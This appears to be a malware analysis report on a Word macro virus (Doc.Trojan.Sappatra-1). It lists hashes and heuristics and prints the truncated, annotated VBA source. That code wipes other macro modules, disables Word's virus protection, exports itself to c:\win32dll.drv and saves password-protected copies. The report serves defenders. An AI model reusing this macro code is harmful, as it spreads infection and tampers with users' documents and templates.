Doc.Trojan.Sappatra-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 7fe3c72986f87412…

MALICIOUS

Office (OLE)

Size: 34.5 KB · Created: 2006-01-10 15:46:00 · Authoring application: Microsoft Word 9.0 · First seen: 2012-06-14
MD5: fd4e3a23f912e9f737d68cb63e4bd7a3 SHA-1: 2ebe9091339c72f18a8376e325ca0ccd669fcba4 SHA-256: 7fe3c72986f87412a1797e5c7411cd2c458eba9b641f931daa3420fa653eb438
Risk Score: 140

Malware Insights

Doc.Trojan.Sappatra-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Sappatra-1. It contains a legacy WordBasic AutoOpen macro, indicated by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic, which is designed to execute automatically. The VBA macro code, while truncated, appears to be involved in removing specific modules and checking directories, suggesting it's part of a larger malicious execution chain. The presence of the AutoOpen macro strongly suggests it was delivered as a spearphishing attachment.

Heuristics 4

  • ClamAV: Doc.Trojan.Sappatra-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sappatra-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5508 bytes
SHA-256: ecc6611801e8c79b0e1a6e305e74ea8a8af1bee602e61496766f45f2c784786f
Preview script
First 1,000 lines of the extracted script
' olevba output: each run of Attribute lines describes the module that follows
' it. First the document's ThisDocument module (no code of its own is shown),
' then, after the blank line, a module named "Sapattra" holding the routines
' below. The AutoOpen entry point reported by the OLE_VBA_AUTOOPEN heuristic
' is not in the visible part of this preview — the listing is truncated.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Module "Sapattra": the module name is also the `signature` string that
' checkSIGN (further down) searches for, and matches the ClamAV family name.
Attribute VB_Name = "Sapattra"
' Analyst note: looks for a VBA component named "ModuleA4" (the value of
' `signature`), first in the active document's VBProject and then in the
' Normal template's VBProject, and empties that component's code with
' DeleteLines. Why ModuleA4 is targeted cannot be told from this listing —
' presumably an earlier or competing macro this family displaces; unconfirmed.
' Defender notes: a macro that walks VBProject.VBComponents and edits other
' modules is macro-virus behaviour in its own right, and the second pass
' reaches the user's global Normal template. On current Office builds this
' object-model access is refused unless "Trust access to the VBA project
' object model" is enabled; under the On Error Resume Next below, refusal
' simply turns the routine into a silent no-op.
' No Option Explicit is visible: ccount, i% and mm$ are used without Dim.
Sub removeA4()
    Dim signature, index, eol, cmt    ' cmt is declared but never used
    Dim sf As Boolean                 ' "signature found" flag for the current pass
    Dim dm                            ' declared but never used
    
    
    On Error Resume Next              ' every failure below is swallowed
    
    signature = "ModuleA4"            ' name of the module whose code is wiped
    sf = False
    index = 0
    eol = 0
    
    
    If Application.Documents.Count < 1 Then
      Exit Sub
    End If
    
    ' Pass 1: active document. If several components match, index keeps the last.
    ccount = Word.ActiveDocument.VBProject.VBComponents.Count
        For i% = 1 To ccount
           mm$ = Word.ActiveDocument.VBProject.VBComponents.Item(i%).Name
           If Trim(mm$) = signature Then
              sf = True
              index = i%
           End If
        Next i%
    
    If sf Then
        ' Delete every line of the matching module; the component itself is not removed.
        eol = Word.ActiveDocument.VBProject.VBComponents.Item(index).CodeModule.CountOfLines
        Word.ActiveDocument.VBProject.VBComponents.Item(index).CodeModule.DeleteLines 1, eol
        sf = False
    End If
    
    ' Pass 2: identical search and wipe against the Normal template.
    ccount = Word.NormalTemplate.VBProject.VBComponents.Count
        For i% = 1 To ccount
           mm$ = Word.NormalTemplate.VBProject.VBComponents.Item(i%).Name
           If Trim(mm$) = signature Then
              sf = True
              index = i%
           End If
        Next i%
    
    If sf Then
        eol = Word.NormalTemplate.VBProject.VBComponents.Item(index).CodeModule.CountOfLines
        Word.NormalTemplate.VBProject.VBComponents.Item(index).CodeModule.DeleteLines 1, eol
        sf = False
    End If
    

End Sub
' Analyst note: makes sure the drop directory c:\msoffice exists, creating it
' when Dir() finds nothing. Called by doSAVE before it writes its copy of the
' document. Host indicator: the presence of c:\msoffice on a workstation.
' Caveats: Dir() with vbDirectory also matches a plain file named msoffice, in
' which case MkDir is skipped and the later SaveAs would presumably fail;
' MyFile is declared but never used; there is no error handler here, so a
' MkDir failure propagates to the caller (doSAVE runs under On Error Resume Next).
Sub checkDIR()
    Dim MyFile, MyPath, MyName
       MyPath = "c:\msoffice"
    MyName = Dir(MyPath, vbDirectory)   ' "" when nothing of that name exists
    If MyName = "" Then
      MkDir "c:\msoffice"               ' same literal as MyPath, repeated rather than reused
    End If
    
End Sub

' Analyst note: saves the active document as
' c:\msoffice\<dd-mmm-yyyy>(<hh-mm-ss AMPM>).doc in Word document format,
' protected with the open password "sapattra" (literal in the SaveAs call),
' with no write password, and adds it to the recent-files list. SaveAs also
' rebinds the open document to that path (standard Word SaveAs behaviour), so
' the user's own subsequent saves land there too. Everything runs under
' On Error Resume Next, so a failed SaveAs is silent.
' Defender notes: c:\msoffice and .doc files named with this date/time pattern
' are host artifacts; the fixed password is the recovery key for documents
' that were re-saved this way. No Option Explicit is visible: s1, s2 and
' path1 are used without Dim.
Sub doSAVE()
    Dim no_of_docs, file1
    Dim myDate, myTime
    
    On Error Resume Next
    
    no_of_docs = Application.Documents.Count
    
    
    
    
    If no_of_docs < 1 Then Exit Sub    ' nothing open -> nothing to save
    
    myDate = Date
    myTime = Time
    
    
    
    ' Date and time tokens use "-" separators, presumably because ":" is not
    ' legal in a Windows file name.
    s1 = Trim(Format(myDate, "dd-mmm-yyyy"))
    s2 = Trim(Format(myTime, "hh-mm-ss AMPM"))
    
    file1 = s1 + "(" + s2 + ")"        ' e.g. 10-Jan-2006(03-46-00 PM)  (constructed example)
    
    checkDIR                            ' ensure c:\msoffice exists
    
    path1 = "c:\msoffice\" + file1 + ".doc"
  
  
    ' Password-protected copy in Word 97-2003 (.doc) format; AddToRecentFiles:=True
    ' leaves an entry in the user's recent-files list.
    ActiveDocument.SaveAs FileName:=path1, FileFormat:=wdFormatDocument, _
        LockComments:=False, Password:="sapattra", AddToRecentFiles:=True, WritePassword _
        :="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:=False, _
        SaveNativePictureFormat:=False, SaveFormsData:=False, SaveAsAOCELetter:= _
        False
    
  

    
     
End Sub


Function checkSIGN(location As Boolean)
    Dim mfile, ccount, index
    Dim signflag As Boolean
    Dim sigunature As String
     
      
      
    On Error Resume Next
    
    Application.DisplayAlerts = wdAlertsNone
    Application.ScreenUpdating = False
    Application.EnableCancelKey = wdCancelInterrupt
    
    Options.VirusProtection = False
    
    mfile = "c:\win32dll.drv"
  
       
    signature = "Sapattra"
    signflag = False
    index = 0
    
    
    If Application.Documents.Count < 1 Then
      checkSIGN = index
      Exit Function
    End If
    
    If (location) Then
        ccount = Word.ActiveDocument.VBProject.VBComponents.Count
        For i% = 1 To ccount
           mm$ = Word.ActiveDocument.VBProject.VBComponents.Item(i%).Name
           If Trim(mm$) = signature Then
              signflag = True
              index = i%
              Word.ActiveDocument.VBProject.VBComponents.Item(index).Export mfile
           End If
        Next i%
    Else
        ccount = Word.NormalTemplate.VBProject.VBComponents.Count
        For i% = 1 To ccount
           mm$ = Word.NormalTemplate.VBProject.VBComponents.Item(i%).Name
           If Trim(mm$) = signature Then
              signflag = True
              index = i%
              Word.Normal
... (truncated)